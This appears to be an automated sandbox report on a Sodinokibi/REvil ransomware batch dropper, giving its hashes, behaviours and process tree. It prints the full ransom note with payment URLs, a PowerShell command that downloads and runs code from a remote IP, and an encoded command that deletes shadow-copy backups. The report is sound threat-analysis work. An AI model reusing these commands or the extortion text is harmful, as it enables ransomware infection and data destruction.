Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    08-08-2020 21:10

General

  • Target

    d0333bd53e654eef1380155f828b71d5.bat

  • Size

    219B

  • MD5

    72cc00975d3f7dc5564c1a0fdbd1897b

  • SHA1

    7eac1c6c294cf6a12495a484965884263cd77ff2

  • SHA256

    c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673

  • SHA512

    9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5

Extracted

Path

C:\80242-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 80242. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F95CCF8219484085 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 4IQZZA2SGXoXFoHthXvp8yVePUq0p+NxB+qQXEDVeEAUkBFuj3BtrUEExOtYQDLz wb1pbUYU/RPNHiimzZUAoi21menF9wq2Tl03KQdoA+uu6S2+GNae4m32k7B4rCrj uOyaTWUpiFWN4PLPQUsAJqbOWqRgZqi5m9zts3F31y+zl7zx/sVwtH3gtnLrxwxA 02bbkdrm/Sv70uv6dQOqJIgS9C89+ttLGuppZfEC/cHjLPt8Pu7XeWiDK0LZai/t C4r27w8LwwuXBopJ+ykNJ+CJtF71qbnInvLHsmEbuw1hHgkWf5jF0CezBEudWQbB U8k3YM5uu1Mtvbxte8ZwnL5GZpEUnLysR7+2Y/MOz6FSw1GQEpZ/psnKHQ5WxE81 aqDem6CtuYdIawRcphxeoA5USq/HtNfx+v3thkFLY/NNHCtQPsvPdWsXGLcRj9GK AkF+yYfH3+qcja/ffVgwb4BeWqdarXKLLGDYt7j6aIr2F9DKYqfpwQcNsmFExX31 Om5EnhSfDt/SF3GUg+SMuzuzTjp65kTOMqGAcZXnw72Y+ImUcXwLQUsxHIsoPTf1 0vIFrVvXO12c0aSPi2zWeoSUpPIqKU/uY//tf6fr8yjI+87K9sI3aglTrLja+mry oOoc/ZufARwFz2rPf1koyqadRBpEfL16k3FwcZEUhdCROq3YrxtWN23UTsI+zQkS j+wTXTbTSum2/HJS3amUxrJGf+sXwQxkVGvTyg+HgFDKMzY6I0zmzXoJ/ors2PdW gzDprKmVR5Ww0Z7Sy3XZba4zwrzqWTeOCJS4s9dkwyHwlv9lWZ/PJ0jJoC0iAOaD +M1FMXHrMoo4Scd0mjAw6oTKipZ3PhNXI3IDgfKSsgRo9vodylRoglytmhNqeiHf eBysIpk2teqXL5kblnTT8O5JcRbWjAYXXuM8dqYo6VyIxMGzyqMl3CybdpArCKNe IyDUDOhNF8CytD+JULg5YcQrX+PtipRmnrqXLjfaeO/7EXy3+7QhfbPgWjLma/Au bYjIJQHXmt5ApTz0amHujiDCdX5jvDr4m7h84ZLfOKCUZIM0pJwukN7Kn479Ra1q VDOwAV4ToHslnHO3qZF9DuboQLGzEGKFrF40I9cxWsvjq1kNXtkF5FPy1LDUCG9b r5XifH1Dmi1ynNH1ClJMLrXl/Sjc2dAHYe7DVJa5TVTfAUodkVWvSf/a26Z42bDv kuWyzsGqd3D5PzneoixnDVNva4UNtEzS7qNafygtWbuo4Mk63tZuG7Mzyicx19yV HlsUlK6+vwRPUwtKiHoeCF/i5VuQkxK1SuRvUfR4 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085

http://decryptor.cc/F95CCF8219484085

Signatures

  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 114 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1296
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Modifies extensions of user files
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      PID:1460
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1608

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1460-5-0x0000000005240000-0x0000000005241000-memory.dmp

    Filesize

    4KB

  • memory/1460-21-0x0000000006250000-0x0000000006251000-memory.dmp

    Filesize

    4KB

  • memory/1460-22-0x00000000062E0000-0x00000000062E1000-memory.dmp

    Filesize

    4KB

  • memory/1460-14-0x0000000006150000-0x0000000006151000-memory.dmp

    Filesize

    4KB

  • memory/1460-13-0x00000000056F0000-0x00000000056F1000-memory.dmp

    Filesize

    4KB

  • memory/1460-8-0x0000000005640000-0x0000000005641000-memory.dmp

    Filesize

    4KB

  • memory/1460-0-0x0000000000000000-mapping.dmp

  • memory/1460-4-0x00000000010D0000-0x00000000010D1000-memory.dmp

    Filesize

    4KB

  • memory/1460-3-0x0000000004740000-0x0000000004741000-memory.dmp

    Filesize

    4KB

  • memory/1460-2-0x0000000000E70000-0x0000000000E71000-memory.dmp

    Filesize

    4KB

  • memory/1460-1-0x0000000074670000-0x0000000074D5E000-memory.dmp

    Filesize

    6.9MB

  • memory/1784-23-0x0000000000000000-mapping.dmp

  • memory/1784-25-0x0000000074670000-0x0000000074D5E000-memory.dmp

    Filesize

    6.9MB